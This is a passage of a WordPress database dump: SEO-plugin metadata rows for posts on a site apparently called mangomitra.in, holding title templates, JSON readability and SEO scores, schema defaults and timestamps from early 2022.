#site_title','#post_excerpt','[]','{\"focus\":[],\"additional\":[]}','{\"analysis\":{\"basic\":{\"lengthContent\":{\"error\":1,\"maxScore\":9,\"score\":6,\"title\":\"Content\",\"description\":\"Please add some content first.\"}},\"title\":{\"titleLength\":{\"error\":1,\"maxScore\":9,\"score\":1,\"title\":\"Title\",\"description\":\"Please add a title first.\"}},\"readability\":{\"contentHasAssets\":{\"error\":1,\"maxScore\":5,\"score\":0,\"title\":\"No content yet\",\"description\":\"Please add some content first.\"}}}}',NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,'',NULL,NULL,'[]',0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'default','{\"article\":{\"articleType\":\"BlogPosting\"},\"course\":{\"name\":\"\",\"description\":\"\",\"provider\":\"\"},\"faq\":{\"pages\":[]},\"product\":{\"reviews\":[]},\"recipe\":{\"ingredients\":[],\"instructions\":[],\"keywords\":[]},\"software\":{\"reviews\":[],\"operatingSystems\":[]},\"webPage\":{\"webPageType\":\"WebPage\"}}',0,1,0,0,0,0,0,0,0,-1,-1,'large','{\"tab\":\"general\",\"tab_social\":\"facebook\",\"tab_sidebar\":\"general\",\"tab_modal\":\"general\",\"tab_modal_social\":\"facebook\"}',NULL,NULL,'default','default',NULL,NULL,NULL,NULL,0,'2022-02-09 05:33:15','2022-02-09 05:33:15'),(67,892,'#post_title #separator_sa #site_title','#post_excerpt','[]','{\"focus\":[],\"additional\":[]}','{\"analysis\":{\"basic\":{\"lengthContent\":{\"error\":1,\"maxScore\":9,\"score\":6,\"title\":\"Content\",\"description\":\"Please add some content first.\"}},\"title\":{\"titleLength\":{\"error\":1,\"maxScore\":9,\"score\":1,\"title\":\"Title\",\"description\":\"Please add a title first.\"}},\"readability\":{\"contentHasAssets\":{\"error\":1,\"maxScore\":5,\"score\":0,\"title\":\"No content yet\",\"description\":\"Please add some content first.\"}}}}',NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,'',NULL,NULL,'[]',0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'default','{\"article\":{\"articleType\":\"BlogPosting\"},\"course\":{\"name\":\"\",\"description\":\"\",\"provider\":\"\"},\"faq\":{\"pages\":[]},\"product\":{\"reviews\":[]},\"recipe\":{\"ingredients\":[],\"instructions\":[],\"keywords\":[]},\"software\":{\"reviews\":[],\"operatingSystems\":[]},\"webPage\":{\"webPageType\":\"WebPage\"}}',0,1,0,0,0,0,0,0,0,-1,-1,'large','{\"tab\":\"general\",\"tab_social\":\"facebook\",\"tab_sidebar\":\"general\",\"tab_modal\":\"general\",\"tab_modal_social\":\"facebook\"}',NULL,NULL,'default','default',NULL,NULL,NULL,NULL,0,'2022-02-09 07:39:25','2022-02-09 07:39:25'),(68,898,'#post_title #separator_sa #site_title','#post_content','[]','{\"focus\":{\"keyphrase\":\"\",\"score\":0,\"analysis\":{\"keyphraseInTitle\":{\"score\":0,\"maxScore\":9,\"error\":1}}},\"additional\":[]}','{\"analysis\":{\"basic\":{\"metadescriptionLength\":{\"title\":\"Meta description length\",\"description\":\"The meta description is too short.\",\"score\":6,\"maxScore\":9,\"error\":1},\"lengthContent\":{\"title\":\"Content length\",\"description\":\"This is far below the recommended minimum of words.\",\"score\":-20,\"maxScore\":9,\"error\":1},\"isInternalLink\":{\"title\":\"Internal links\",\"description\":\"We couldn\'t find any internal links in your content. Add internal links in your content.\",\"score\":3,\"maxScore\":9,\"error\":1},\"isExternalLink\":{\"title\":\"External links\",\"description\":\"No outbound links were found. Link out to external resources.\",\"score\":3,\"maxScore\":9,\"error\":1},\"errors\":4},\"title\":{\"titleLength\":{\"title\":\"SEO Title length\",\"description\":\"The title is too short.\",\"score\":6,\"maxScore\":9,\"error\":1},\"errors\":1},\"readability\":{\"contentHasAssets\":{\"error\":1,\"title\":\"Images\\/videos in content\",\"description\":\"You are not using rich media like images or videos.\",\"score\":1,\"maxScore\":5},\"paragraphLength\":{\"title\":\"Paragraphs length\",\"description\":\"You are using short paragraphs.\",\"score\":5,\"maxScore\":5,\"error\":0},\"sentenceLength\":{\"title\":\"Sentences length\",\"description\":\"Sentence length is looking great!\",\"score\":9,\"maxScore\":9,\"error\":0},\"passiveVoice\":{\"title\":\"Passive voice\",\"description\":\"You\'re using enough active voice. That\'s great!\",\"score\":9,\"maxScore\":9,\"error\":0},\"transitionWords\":[],\"consecutiveSentences\":{\"title\":\"Consecutive sentences\",\"description\":\"There is enough variety in your sentences. That\'s great!\",\"score\":9,\"maxScore\":9,\"error\":0},\"subheadingsDistribution\":{\"title\":\"Subheading distribution\",\"description\":\"You are not using any subheadings, but your text is short enough and probably doesn\'t need them.\",\"score\":9,\"maxScore\":9,\"error\":0},\"calculateFleschReading\":{\"title\":\"Flesch reading ease\",\"description\":\"The copy scores 0 in the test, which is considered very difficult to read. Try to make shorter sentences, using less difficult words to improve readability.\",\"score\":3,\"maxScore\":9,\"error\":1},\"errors\":2}}}',NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,'',NULL,NULL,'[]',0,'default','default',NULL,NULL,NULL,NULL,NULL,64,'default','{\"article\":{\"articleType\":\"BlogPosting\"},\"course\":{\"name\":\"\",\"description\":\"\",\"provider\":\"\"},\"faq\":{\"pages\":[]},\"product\":{\"reviews\":[]},\"recipe\":{\"ingredients\":[],\"instructions\":[],\"keywords\":[]},\"software\":{\"reviews\":[],\"operatingSystems\":[]},\"webPage\":{\"webPageType\":\"WebPage\"}}',0,1,0,0,0,0,0,0,0,-1,-1,'large','{\"tab\":\"general\",\"tab_social\":\"facebook\",\"tab_sidebar\":\"general\",\"tab_modal\":\"general\",\"tab_modal_social\":\"facebook\"}',NULL,NULL,'default','default',NULL,NULL,NULL,NULL,0,'2022-02-09 08:07:44','2022-02-09 08:07:44'),(69,901,'#post_title #separator_sa #site_title','#post_excerpt','[]','{\"focus\":{\"keyphrase\":\"\",\"score\":0,\"analysis\":{\"keyphraseInTitle\":{\"score\":0,\"maxScore\":9,\"error\":1}}},\"additional\":[]}','{\"analysis\":{\"basic\":{\"lengthContent\":{\"error\":1,\"maxScore\":9,\"score\":6,\"title\":\"Content\",\"description\":\"Please add some content first.\"}},\"title\":{\"titleLength\":{\"error\":1,\"maxScore\":9,\"score\":1,\"title\":\"Title\",\"description\":\"Please add a title first.\"}},\"readability\":{\"contentHasAssets\":{\"error\":1,\"maxScore\":5,\"score\":0,\"title\":\"No content yet\",\"description\":\"Please add some content first.\"}}}}',NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,'',NULL,NULL,'[]',0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'default','{\"article\":{\"articleType\":\"BlogPosting\"},\"course\":{\"name\":\"\",\"description\":\"\",\"provider\":\"\"},\"faq\":{\"pages\":[]},\"product\":{\"reviews\":[]},\"recipe\":{\"ingredients\":[],\"instructions\":[],\"keywords\":[]},\"software\":{\"reviews\":[],\"operatingSystems\":[]},\"webPage\":{\"webPageType\":\"WebPage\"}}',0,1,0,0,0,0,0,0,0,-1,-1,'large','{\"tab\":\"general\",\"tab_social\":\"facebook\",\"tab_sidebar\":\"general\",\"tab_modal\":\"general\",\"tab_modal_social\":\"facebook\"}',NULL,NULL,'default','default',NULL,NULL,NULL,NULL,0,'2022-02-09 08:11:26','2022-02-09 08:11:26'),(70,900,'#post_title #separator_sa #site_title','#post_excerpt','[]','{\"focus\":{\"keyphrase\":\"\",\"score\":0,\"analysis\":{\"keyphraseInTitle\":{\"score\":0,\"maxScore\":9,\"error\":1}}},\"additional\":[]}','{\"analysis\":{\"basic\":{\"lengthContent\":{\"error\":1,\"maxScore\":9,\"score\":6,\"title\":\"Content\",\"description\":\"Please add some content first.\"}},\"title\":{\"titleLength\":{\"error\":1,\"maxScore\":9,\"score\":1,\"title\":\"Title\",\"description\":\"Please add a title first.\"}},\"readability\":{\"contentHasAssets\":{\"error\":1,\"maxScore\":5,\"score\":0,\"title\":\"No content yet\",\"description\":\"Please add some content first.\"}}}}',NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,'',NULL,NULL,'[]',0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'default','{\"article\":{\"articleType\":\"BlogPosting\"},\"course\":{\"name\":\"\",\"description\":\"\",\"provider\":\"\"},\"faq\":{\"pages\":[]},\"product\":{\"reviews\":[]},\"recipe\":{\"ingredients\":[],\"instructions\":[],\"keywords\":[]},\"software\":{\"reviews\":[],\"operatingSystems\":[]},\"webPage\":{\"webPageType\":\"WebPage\"}}',0,1,0,0,0,0,0,0,0,-1,-1,'large','{\"tab\":\"general\",\"tab_social\":\"facebook\",\"tab_sidebar\":\"general\",\"tab_modal\":\"general\",\"tab_modal_social\":\"facebook\"}',NULL,'2022-02-09 09:15:18','default','default',NULL,NULL,NULL,NULL,0,'2022-02-09 08:11:26','2022-02-25 10:46:47'),(71,902,'#post_title #separator_sa #site_title','#post_content','[]','{\"focus\":{\"keyphrase\":\"\",\"score\":0,\"analysis\":{\"keyphraseInTitle\":{\"score\":0,\"maxScore\":9,\"error\":1}}},\"additional\":[]}','{\"analysis\":{\"basic\":{\"metadescriptionLength\":{\"title\":\"Meta description length\",\"description\":\"The meta description is too short.\",\"score\":6,\"maxScore\":9,\"error\":1},\"lengthContent\":{\"title\":\"Content length\",\"description\":\"This is far below the recommended minimum of words.\",\"score\":-20,\"maxScore\":9,\"error\":1},\"isInternalLink\":{\"title\":\"Internal links\",\"description\":\"We couldn\'t find any internal links in your content. Add internal links in your content.\",\"score\":3,\"maxScore\":9,\"error\":1},\"isExternalLink\":{\"title\":\"External links\",\"description\":\"No outbound links were found. Link out to external resources.\",\"score\":3,\"maxScore\":9,\"error\":1},\"errors\":4},\"title\":{\"titleLength\":{\"title\":\"SEO Title length\",\"description\":\"The title is too short.\",\"score\":6,\"maxScore\":9,\"error\":1},\"errors\":1},\"readability\":{\"contentHasAssets\":{\"error\":1,\"title\":\"Images\\/videos in content\",\"description\":\"You are not using rich media like images or videos.\",\"score\":1,\"maxScore\":5},\"paragraphLength\":{\"title\":\"Paragraphs length\",\"description\":\"You are using short paragraphs.\",\"score\":5,\"maxScore\":5,\"error\":0},\"sentenceLength\":{\"title\":\"Sentences length\",\"description\":\"Sentence length is looking great!\",\"score\":9,\"maxScore\":9,\"error\":0},\"passiveVoice\":{\"title\":\"Passive voice\",\"description\":\"You\'re using enough active voice. That\'s great!\",\"score\":9,\"maxScore\":9,\"error\":0},\"transitionWords\":[],\"consecutiveSentences\":{\"title\":\"Consecutive sentences\",\"description\":\"There is enough variety in your sentences. That\'s great!\",\"score\":9,\"maxScore\":9,\"error\":0},\"subheadingsDistribution\":{\"title\":\"Subheading distribution\",\"description\":\"You are not using any subheadings, but your text is short enough and probably doesn\'t need them.\",\"score\":9,\"maxScore\":9,\"error\":0},\"calculateFleschReading\":{\"title\":\"Flesch reading ease\",\"description\":\"The copy scores 0 in the test, which is considered very difficult to read. Try to make shorter sentences, using less difficult words to improve readability.\",\"score\":3,\"maxScore\":9,\"error\":1},\"errors\":2}}}',NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,'',NULL,NULL,'[]',0,'default','default',NULL,NULL,NULL,NULL,NULL,64,'default','{\"article\":{\"articleType\":\"BlogPosting\"},\"course\":{\"name\":\"\",\"description\":\"\",\"provider\":\"\"},\"faq\":{\"pages\":[]},\"product\":{\"reviews\":[]},\"recipe\":{\"ingredients\":[],\"instructions\":[],\"keywords\":[]},\"software\":{\"reviews\":[],\"operatingSystems\":[]},\"webPage\":{\"webPageType\":\"WebPage\"}}',0,1,0,0,0,0,0,0,0,-1,-1,'large','{\"tab\":\"general\",\"tab_social\":\"facebook\",\"tab_sidebar\":\"general\",\"tab_modal\":\"general\",\"tab_modal_social\":\"facebook\"}',NULL,'2022-02-09 09:57:24','default','default',NULL,NULL,NULL,NULL,0,'2022-02-09 08:14:10','2022-02-09 09:57:24'),(72,905,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large',NULL,'[{\"image:loc\":\"https:\\/\\/mangomitra.in\\/wp-content\\/uploads\\/2022\\/02\\/download-1-1.jfif\",\"image:title\":\"download-1-1\",\"image:caption\":\"\"}]','2022-02-09 08:17:18',NULL,NULL,NULL,NULL,NULL,NULL,0,'2022-02-09 08:17:18','2022-02-09 08:17:18'),(73,909,'#post_title #separator_sa #site_title','#post_excerpt','[]','{\"focus\":{\"keyphrase\":\"\",\"score\":0,\"analysis\":{\"keyphraseInTitle\":{\"score\":0,\"maxScore\":9,\"error\":1}}},\"additional\":[]}','{\"analysis\":{\"basic\":{\"lengthContent\":{\"error\":1,\"maxScore\":9,\"score\":6,\"title\":\"Content\",\"description\":\"Please add some content first.\"}},\"title\":{\"titleLength\":{\"error\":1,\"maxScore\":9,\"score\":1,\"title\":\"Title\",\"description\":\"Please add a title first.\"}},\"readability\":{\"contentHasAssets\":{\"error\":1,\"maxScore\":5,\"score\":0,\"title\":\"No content yet\",\"description\":\"Please add some content first.\"}}}}',NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,'',NULL,NULL,'[]',0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'default','{\"article\":{\"articleType\":\"BlogPosting\"},\"course\":{\"name\":\"\",\"description\":\"\",\"provider\":\"\"},\"faq\":{\"pages\":[]},\"product\":{\"reviews\":[]},\"recipe\":{\"ingredients\":[],\"instructions\":[],\"keywords\":[]},\"software\":{\"reviews\":[],\"operatingSystems\":[]},\"webPage\":{\"webPageType\":\"WebPage\"}}',0,1,0,0,0,0,0,0,0,-1,-1,'large','{\"tab\":\"general\",\"tab_social\":\"facebook\",\"tab_sidebar\":\"general\",\"tab_modal\":\"general\",\"tab_modal_social\":\"facebook\"}',NULL,NULL,'default','default',NULL,NULL,NULL,NULL,0,'2022-02-09 08:58:38','2022-02-09 08:58:38'),(74,910,'#post_title #separator_sa #site_title','#post_excerpt','[]','{\"focus\":{\"keyphrase\":\"\",\"score\":0,\"analysis\":{\"keyphraseInTitle\":{\"score\":0,\"maxScore\":9,\"error\":1}}},\"additional\":[]}','{\"analysis\":{\"basic\":{\"lengthContent\":{\"error\":1,\"maxScore\":9,\"score\":6,\"title\":\"Content\",\"description\":\"Please add some content first.\"}},\"title\":{\"titleLength\":{\"error\":1,\"maxScore\":9,\"score\":1,\"title\":\"Title\",\"description\":\"Please add a title first.\"}},\"readability\":{\"contentHasAssets\":{\"error\":1,\"maxScore\":5,\"score\":0,\"title\":\"No content yet\",\"description\":\"Please add some content first.\"}}}}',NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,'',NULL,NULL,'[]',0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'default','{\"article\":{\"articleType\":\"BlogPosting\"},\"course\":{\"name\":\"\",\"description\":\"\",\"provider\":\"\"},\"faq\":{\"pages\":[]},\"product\":{\"reviews\":[]},\"recipe\":{\"ingredients\":[],\"instructions\":[],\"keywords\":[]},\"software\":{\"reviews\":[],\"operatingSystems\":[]},\"webPage\":{\"webPageType\":\"WebPage\"}}',0,1,0,0,0,0,0,0,0,-1,-1,'large','{\"tab\":\"general\",\"tab_social\":\"facebook\",\"tab_sidebar\":\"general\",\"tab_modal\":\"general\",\"tab_modal_social\":\"facebook\"}',NULL,NULL,'default','default',NULL,NULL,NULL,NULL,0,'2022-02-09 08:58:51','2022-02-09 08:59:49'),(75,911,'#post_title #separator_sa #site_title','#post_excerpt','[]','{\"focus\":{\"keyphrase\":\"\",\"score\":0,\"analysis\":{\"keyphraseInTitle\":{\"score\":0,\"maxScore\":9,\"error\":1}}},\"additional\":[]}','{\"analysis\":{\"basic\":{\"lengthContent\":{\"error\":1,\"maxScore\":9,\"score\":6,\"title\":\"Content\",\"description\":\"Please add some content first.\"}},\"title\":{\"titleLength\":{\"error\":1,\"maxScore\":9,\"score\":1,\"title\":\"Title\",\"description\":\"Please add a title first.\"}},\"readability\":{\"contentHasAssets\":{\"error\":1,\"maxScore\":5,\"score\":0,\"title\":\"No content yet\",\"description\":\"Please add some content first.\"}}}}',NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,'',NULL,NULL,'[]',0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'default','{\"article\":{\"articleType\":\"BlogPosting\"},\"course\":{\"name\":\"\",\"description\":\"\",\"provider\":\"\"},\"faq\":{\"pages\":[]},\"product\":{\"reviews\":[]},\"recipe\":{\"ingredients\":[],\"instructions\":[],\"keywords\":[]},\"software\":{\"reviews\":[],\"operatingSystems\":[]},\"webPage\":{\"webPageType\":\"WebPage\"}}',0,1,0,0,0,0,0,0,0,-1,-1,'large','{\"tab\":\"general\",\"tab_social\":\"facebook\",\"tab_sidebar\":\"general\",\"tab_modal\":\"general\",\"tab_modal_social\":\"facebook\"}',NULL,NULL,'default','default',NULL,NULL,NULL,NULL,0,'2022-02-09 08:59:39','2022-02-09 08:59:39'),(76,912,'#post_title #separator_sa #site_title','#post_excerpt','[]','{\"focus\":{\"keyphrase\":\"\",\"score\":0,\"analysis\":{\"keyphraseInTitle\":{\"score\":0,\"maxScore\":9,\"error\":1}}},\"additional\":[]}','{\"analysis\":{\"basic\":{\"lengthContent\":{\"error\":1,\"maxScore\":9,\"score\":6,\"title\":\"Content\",\"description\":\"Please add some content first.\"}},\"title\":{\"titleLength\":{\"error\":1,\"maxScore\":9,\"score\":1,\"title\":\"Title\",\"description\":\"Please add a title first.\"}},\"readability\":{\"contentHasAssets\":{\"error\":1,\"maxScore\":5,\"score\":0,\"title\":\"No content yet\",\"description\":\"Please add some content first.\"}}}}',NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,'',NULL,NULL,'[]',0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'default','{\"article\":{\"articleType\":\"BlogPosting\"},\"course\":{\"name\":\"\",\"description\":\"\",\"provider\":\"\"},\"faq\":{\"pages\":[]},\"product\":{\"reviews\":[]},\"recipe\":{\"ingredients\":[],\"instructions\":[],\"keywords\":[]},\"software\":{\"reviews\":[],\"operatingSystems\":[]},\"webPage\":{\"webPageType\":\"WebPage\"}}',0,1,0,0,0,0,0,0,0,-1,-1,'large','{\"tab\":\"general\",\"tab_social\":\"facebook\",\"tab_sidebar\":\"general\",\"tab_modal\":\"general\",\"tab_modal_social\":\"facebook\"}',NULL,NULL,'default','default',NULL,NULL,NULL,NULL,0,'2022-02-09 09:10:19','2022-02-09 09:10:19'),(77,913,'#post_title #separator_sa #site_title','#post_excerpt','[]','{\"focus\":{\"keyphrase\":\"\",\"score\":0,\"analysis\":{\"keyphraseInTitle\":{\"score\":0,\"maxScore\":9,\"error\":1}}},\"additional\":[]}','{\"analysis\":{\"basic\":{\"lengthContent\":{\"error\":1,\"maxScore\":9,\"score\":6,\"title\":\"Content\",\"description\":\"Please add some content first.\"}},\"title\":{\"titleLength\":{\"error\":1,\"maxScore\":9,\"score\":1,\"title\":\"Title\",\"description\":\"Please add a title first.\"}},\"readability\":{\"contentHasAssets\":{\"error\":1,\"maxScore\":5,\"score\":0,\"title\":\"No content yet\",\"description\":\"Please add some content first.\"}}}}',NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,'',NULL,NULL,'[]',0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'default','{\"article\":{\"articleType\":\"BlogPosting\"},\"course\":{\"name\":\"\",\"description\":\"\",\"provider\":\"\"},\"faq\":{\"pages\":[]},\"product\":{\"reviews\":[]},\"recipe\":{\"ingredients\":[],\"instructions\":[],\"keywords\":[]},\"software\":{\"reviews\":[],\"operatingSystems\":[]},\"webPage\":{\"webPageType\":\"WebPage\"}}',0,1,0,0,0,0,0,0,0,-1,-1,'large','{\"tab\":\"general\",\"tab_social\":\"facebook\",\"tab_sidebar\":\"general\",\"tab_modal\":\"general\",\"tab_modal_social\":\"facebook\"}',NULL,NULL,'default','default',NULL,NULL,NULL,NULL,0,'2022-02-09 09:14:35','2022-02-09 09:14:35'),(78,914,'#post_title #separator_sa #site_title','#post_excerpt','[]','{\"focus\":{\"keyphrase\":\"\",\"score\":0,\"analysis\":{\"keyphraseInTitle\":{\"score\":0,\"maxScore\":9,\"error\":1}}},\"additional\":[]}','{\"analysis\":{\"basic\":{\"lengthContent\":{\"error\":1,\"maxScore\":9,\"score\":6,\"title\":\"Content\",\"description\":\"Please add some content first.\"}},\"title\":{\"titleLength\":{\"error\":1,\"maxScore\":9,\"score\":1,\"title\":\"Title\",\"description\":\"Please add a title first.\"}},\"readability\":{\"contentHasAssets\":{\"error\":1,\"maxScore\":5,\"score\":0,\"title\":\"No content yet\",\"description\":\"Please add some content first.\"}}}}',NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,'',NULL,NULL,'[]',0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'default','{\"article\":{\"articleType\":\"BlogPosting\"},\"course\":{\"name\":\"\",\"description\":\"\",\"provider\":\"\"},\"faq\":{\"pages\":[]},\"product\":{\"reviews\":[]},\"recipe\":{\"ingredients\":[],\"instructions\":[],\"keywords\":[]},\"software\":{\"reviews\":[],\"operatingSystems\":[]},\"webPage\":{\"webPageType\":\"WebPage\"}}',0,1,0,0,0,0,0,0,0,-1,-1,'large','{\"tab\":\"general\",\"tab_social\":\"facebook\",\"tab_sidebar\":\"general\",\"tab_modal\":\"general\",\"tab_modal_social\":\"facebook\"}',NULL,NULL,'default','default',NULL,NULL,NULL,NULL,0,'2022-02-09 09:14:53','2022-02-09 09:14:53'),(79,1014,'#post_title #separator_sa #site_title','#post_excerpt','[]','{\"focus\":{\"keyphrase\":\"\",\"score\":0,\"analysis\":{\"keyphraseInTitle\":{\"score\":0,\"maxScore\":9,\"error\":1}}},\"additional\":[]}','{\"analysis\":{\"basic\":{\"lengthContent\":{\"error\":1,\"maxScore\":9,\"score\":6,\"title\":\"Content\",\"description\":\"Please add some content first.\"}},\"title\":{\"titleLength\":{\"error\":1,\"maxScore\":9,\"score\":1,\"title\":\"Title\",\"description\":\"Please add a title first.\"}},\"readability\":{\"contentHasAssets\":{\"error\":1,\"maxScore\":5,\"score\":0,\"title\":\"No content yet\",\"description\":\"Please add some content first.\"}}}}',NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,'',NULL,NULL,'[]',0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'default','{\"article\":{\"articleType\":\"BlogPosting\"},\"course\":{\"name\":\"\",\"description\":\"\",\"provider\":\"\"},\"faq\":{\"pages\":[]},\"product\":{\"reviews\":[]},\"recipe\":{\"ingredients\":[],\"instructions\":[],\"keywords\":[]},\"software\":{\"reviews\":[],\"operatingSystems\":[]},\"webPage\":{\"webPageType\":\"WebPage\"}}',0,1,0,0,0,0,0,0,0,-1,-1,'large','{\"tab\":\"general\",\"tab_social\":\"facebook\",\"tab_sidebar\":\"general\",\"tab_modal\":\"general\",\"tab_modal_social\":\"facebook\"}',NULL,NULL,'default','default',NULL,NULL,NULL,NULL,0,'2022-02-25 10:45:11','2022-02-25 10:45:11'),(80,1015,'#post_title #separator_sa #site_title','#post_excerpt','[]','{\"focus\":{\"keyphrase\":\"\",\"score\":0,\"analysis\":{\"keyphraseInTitle\":{\"score\":0,\"maxScore\":9,\"error\":1}}},\"additional\":[]}','{\"analysis\":{\"basic\":{\"lengthContent\":{\"error\":1,\"maxScore\":9,\"score\":6,\"title\":\"Content\",\"description\":\"Please add some content first.\"}},\"title\":{\"titleLength\":{\"error\":1,\"maxScore\":9,\"score\":1,\"title\":\"Title\",\"description\":\"Please add a title first.\"}},\"readability\":{\"contentHasAssets\":{\"error\":1,\"maxScore\":5,\"score\":0,\"title\":\"No content yet\",\"description\":\"Please add some content first.\"}}}}',NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,'',NULL,NULL,'[]',0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'default','{\"article\":{\"articleType\":\"BlogPosting\"},\"course\":{\"name\":\"\",\"description\":\"\",\"provider\":\"\"},\"faq\":{\"pages\":[]},\"product\":{\"reviews\":[]},\"recipe\":{\"ingredients\":[],\"instructions\":[],\"keywords\":[]},\"software\":{\"reviews\":[],\"operatingSystems\":[]},\"webPage\":{\"webPageType\":\"WebPage\"}}',0,1,0,0,0,0,0,0,0,-1,-1,'large','{\"tab\":\"general\",\"tab_social\":\"facebook\",\"tab_sidebar\":\"general\",\"tab_modal\":\"general\",\"tab_modal_social\":\"facebook\"}',NULL,NULL,'default','default',NULL,NULL,NULL,NULL,0,'2022-02-25 10:46:47','2022-02-25 10:46:47'),(81,1039,'#post_title #separator_sa #site_title','#post_excerpt','[]','{\"focus\":{\"keyphrase\":\"\",\"score\":0,\"analysis\":{\"keyphraseInTitle\":{\"score\":0,\"maxScore\":9,\"error\":1}}},\"additional\":[]}','{\"analysis\":{\"basic\":{\"metadescriptionLength\":[],\"lengthContent\":{\"title\":\"Content length\",\"description\":\"This is far below the recommended minimum of words.\",\"score\":-20,\"maxScore\":9,\"error\":1},\"isInternalLink\":{\"title\":\"Internal links\",\"description\":\"We couldn\'t find any internal links in your content. Add internal links in your content.\",\"score\":3,\"maxScore\":9,\"error\":1},\"isExternalLink\":{\"title\":\"External links\",\"description\":\"No outbound links were found. Link out to external resources.\",\"score\":3,\"maxScore\":9,\"error\":1},\"errors\":3},\"title\":{\"titleLength\":{\"title\":\"SEO Title length\",\"description\":\"The title is too short.\",\"score\":6,\"maxScore\":9,\"error\":1},\"errors\":1},\"readability\":{\"contentHasAssets\":{\"error\":1,\"title\":\"Images\\/videos in content\",\"description\":\"You are not using rich media like images or videos.\",\"score\":1,\"maxScore\":5},\"paragraphLength\":{\"title\":\"Paragraphs length\",\"description\":\"You are using short paragraphs.\",\"score\":5,\"maxScore\":5,\"error\":0},\"sentenceLength\":{\"title\":\"Sentences length\",\"description\":\"Sentence length is looking great!\",\"score\":9,\"maxScore\":9,\"error\":0},\"passiveVoice\":{\"title\":\"Passive voice\",\"description\":\"You\'re using enough active voice. That\'s great!\",\"score\":9,\"maxScore\":9,\"error\":0},\"transitionWords\":[],\"consecutiveSentences\":{\"title\":\"Consecutive sentences\",\"description\":\"There is enough variety in your sentences. That\'s great!\",\"score\":9,\"maxScore\":9,\"error\":0},\"subheadingsDistribution\":{\"title\":\"Subheading distribution\",\"description\":\"You are not using any subheadings, but your text is short enough and probably doesn\'t need them.\",\"score\":9,\"maxScore\":9,\"error\":0},\"calculateFleschReading\":{\"title\":\"Flesch reading ease\",\"description\":\"The copy scores 0 in the test, which is considered very difficult to read. Try to make shorter sentences, using less difficult words to improve readability.\",\"score\":3,\"maxScore\":9,\"error\":1},\"errors\":2}}}',NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,'',NULL,NULL,'[]',0,'default','default',NULL,NULL,NULL,NULL,NULL,60,'default','{\"article\":{\"articleType\":\"BlogPosting\"},\"course\":{\"name\":\"\",\"description\":\"\",\"provider\":\"\"},\"faq\":{\"pages\":[]},\"product\":{\"reviews\":[]},\"recipe\":{\"ingredients\":[],\"instructions\":[],\"keywords\":[]},\"software\":{\"reviews\":[],\"operatingSystems\":[]},\"webPage\":{\"webPageType\":\"WebPage\"}}',0,1,0,0,0,0,0,0,0,-1,-1,'large','{\"tab\":\"general\",\"tab_social\":\"facebook\",\"tab_sidebar\":\"general\",\"tab_modal\":\"general\",\"tab_modal_social\":\"facebook\"}',NULL,NULL,'default','default',NULL,NULL,NULL,NULL,0,'2022-03-03 09:47:45','2022-03-03 09:47:45'),(82,1041,'#post_title #separator_sa #site_title','#post_excerpt','[]','{\"focus\":{\"keyphrase\":\"\",\"score\":0,\"analysis\":{\"keyphraseInTitle\":{\"score\":0,\"maxScore\":9,\"error\":1}}},\"additional\":[]}','{\"analysis\":{\"basic\":{\"lengthContent\":{\"error\":1,\"title\":\"No content yet\",\"description\":\"Please add some content first.\",\"score\":1,\"maxScore\":5}},\"title\":{\"titleLength\":{\"title\":\"SEO Title length\",\"description\":\"The title is too short.\",\"score\":6,\"maxScore\":9,\"error\":1},\"errors\":1},\"readability\":{\"contentHasAssets\":{\"error\":1,\"title\":\"No content yet\",\"description\":\"Please add some content first.\",\"score\":1,\"maxScore\":5}}}}',NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,'',NULL,NULL,'[]',0,'default','default',NULL,NULL,NULL,NULL,NULL,67,'default','{\"article\":{\"articleType\":\"BlogPosting\"},\"course\":{\"name\":\"\",\"description\":\"\",\"provider\":\"\"},\"faq\":{\"pages\":[]},\"product\":{\"reviews\":[]},\"recipe\":{\"ingredients\":[],\"instructions\":[],\"keywords\":[]},\"software\":{\"reviews\":[],\"operatingSystems\":[]},\"webPage\":{\"webPageType\":\"WebPage\"}}',0,1,0,0,0,0,0,0,0,-1,-1,'large','{\"tab\":\"general\",\"tab_social\":\"facebook\",\"tab_sidebar\":\"general\",\"tab_modal\":\"general\",\"tab_modal_social\":\"facebook\"}',NULL,NULL,'default','default',NULL,NULL,NULL,NULL,0,'2022-03-03 09:53:41','2022-03-03 11:15:17'),(83,1006,'#post_title #separator_sa #site_title','#post_excerpt','[]','{\"focus\":{\"keyphrase\":\"\",\"score\":0,\"analysis\":{\"keyphraseInTitle\":{\"score\":0,\"maxScore\":9,\"error\":1}}},\"additional\":[]}','{\"analysis\":{\"basic\":{\"metadescriptionLength\":{\"title\":\"Meta description length\",\"description\":\"The meta description is too 